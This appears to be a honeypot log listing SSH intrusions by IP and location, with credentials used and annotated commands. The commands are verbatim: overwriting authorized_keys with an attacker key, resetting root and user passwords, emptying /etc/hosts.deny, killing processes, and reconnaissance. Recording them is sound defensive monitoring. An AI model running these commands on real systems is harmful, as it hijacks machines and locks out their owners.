$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 yankee_root_28 (138.197.204.198) β€” Santa Clara, United States Β· 2 sessions Β· 4 cmds
2026-05-25 06:23 EDT Β· as curl/welltech12, harish/harish@123
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 cipher_root_54 (103.189.235.176) β€” Singapore, Singapore Β· 3 sessions Β· 24 cmds
2026-05-25 05:19 EDT Β· as curl/welltech12, root/Welcome@2026, tunnel/test
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "test\nQsrcDnvkUkiu\nQsrcDnvkUkiu"|passwd|bash
$ Enter new UNIX password:
$ echo "test\nQsrcDnvkUkiu\nQsrcDnvkUkiu\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shogun_root_7 (109.123.229.175) β€” Tokyo, Japan Β· 1 session Β· 2 cmds
2026-05-25 06:11 EDT Β· as root/P@ssw0rd1
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 chai_root_15 (125.16.27.190) β€” Hyderabad, India Β· 3 sessions Β· 23 cmds
2026-05-25 05:23 EDT Β· as curl/welltech12, root/Welcome@2026, tunnel/test
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:TkuLCbIIkzGg"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_62 (122.10.115.18) β€” Mong Kok, Hong Kong Β· 2 sessions Β· 21 cmds
2026-05-22 11:42 EDT Β· as curl/welltech12, root/123456asd
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:8I5Z6R96DQ4L"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_4 (14.103.112.108) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-05-25 06:00 EDT Β· as test3/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\n0j1x3eIFSrNh\n0j1x3eIFSrNh"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\n0j1x3eIFSrNh\n0j1x3eIFSrNh\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 liberty_root_23 (62.132.18.142) β€” Washington, United States Β· 1 session Β· 2 cmds
2026-05-25 05:50 EDT Β· as root/fjbdfdjkdsfs541544@@
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 phantom_root_63 (160.155.68.8) β€” Abidjan, Ivory Coast Β· 3 sessions Β· 41 cmds
2026-05-25 04:27 EDT Β· as curl/welltech12, dino/dino, root/fjbdfdjkdsfs541544@@
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:GGzOoBW3M7Iy"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "dino\nbpVVeKCLAO1t\nbpVVeKCLAO1t"|passwd|bash
$ Enter new UNIX password:
$ echo "dino\nbpVVeKCLAO1t\nbpVVeKCLAO1t\n"|passwd
🎭 tea_root_4 (87.106.35.227) β€” Worcester, United Kingdom Β· 2 sessions Β· 22 cmds
2026-05-23 01:49 EDT Β· as olivier/olivier, root/fjbdfdjkdsfs541544@@
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "olivier\n0My5T91fQaP1\n0My5T91fQaP1"|passwd|bash
$ Enter new UNIX password:
$ echo "olivier\n0My5T91fQaP1\n0My5T91fQaP1\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_15 (101.36.111.86) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 22 cmds
2026-05-25 05:24 EDT Β· as curl/welltech12, root/fjbdfdjkdsfs541544@@
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "welltech12\n8Ynm0x0ZqApJ\n8Ynm0x0ZqApJ"|passwd|bash
$ Enter new UNIX password:
$ echo "welltech12\n8Ynm0x0ZqApJ\n8Ynm0x0ZqApJ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_64 (69.5.21.13) β€” Banguntapan, Indonesia Β· 1 session Β· 18 cmds
2026-05-25 05:25 EDT Β· as ts/1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1\nGg2agvBUJo3d\nGg2agvBUJo3d"|passwd|bash
$ Enter new UNIX password:
$ echo "1\nGg2agvBUJo3d\nGg2agvBUJo3d\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
🎭 jade_root_13 (112.43.32.209) β€” Guangzhou, China Β· 3 sessions Β· 6 cmds
2026-05-25 04:29 EDT Β· as admin/Symbol
busybox β†’ ? (repeated busybox 3x)
$ /bin/busybox Wc6f6yBf Γ—3
$ Γ—3
🎭 spice_root_9 (103.158.40.65) β€” Gondal, India Β· 2 sessions Β· 39 cmds
2026-05-25 04:13 EDT Β· as dino/dino, root/fjbdfdjkdsfs541544@@
busybox β†’ ? (repeated busybox 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "dino\n6JMu9Ztp1ElS\n6JMu9Ztp1ElS"|passwd|bash
$ Enter new UNIX password:
$ echo "dino\n6JMu9Ztp1ElS\n6JMu9Ztp1ElS\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:T9qQA3BLDQ3u"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 tiger_root_4 (113.193.234.210) β€” Bengaluru, India Β· 3 sessions Β· 59 cmds
2026-05-03 22:46 EDT Β· as ly/123, root/diva, ubuntu/!QAZ2wsx#EDC
busybox β†’ ? (repeated busybox 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "123\nPBuUgEDhHLmI\nPBuUgEDhHLmI"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123\nPBuUgEDhHLmI\nPBuUgEDhHLmI\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "!QAZ2wsx#EDC\nE4THZJSLDAjo\nE4THZJSLDAjo"|passwd|bash
$ echo "!QAZ2wsx#EDC\nE4THZJSLDAjo\nE4THZJSLDAjo\n"|passwd
$ echo "root:PqSOiimRj98p"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 steppe_root_4 (91.226.105.59) β€” Izhevsk, Russia Β· 2 sessions Β· 22 cmds
2026-05-25 02:23 EDT Β· as bitcoin/bitcoin, ubuntu/123456aA
busybox β†’ ? (repeated busybox 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "bitcoin\nw029mhEPnk9t\nw029mhEPnk9t"|passwd|bash
$ Enter new UNIX password:
$ echo "bitcoin\nw029mhEPnk9t\nw029mhEPnk9t\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 samba_root_5 (187.33.251.218) β€” JoΓ£o Pessoa, Brazil Β· 2 sessions Β· 40 cmds
2026-05-25 02:30 EDT Β· as ly/123, ubuntu/!QAZ2wsx#EDC
busybox β†’ ? (repeated busybox 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "!QAZ2wsx#EDC\nkN6uo9fDkdOe\nkN6uo9fDkdOe"|passwd|bash
$ Enter new UNIX password: Γ—2
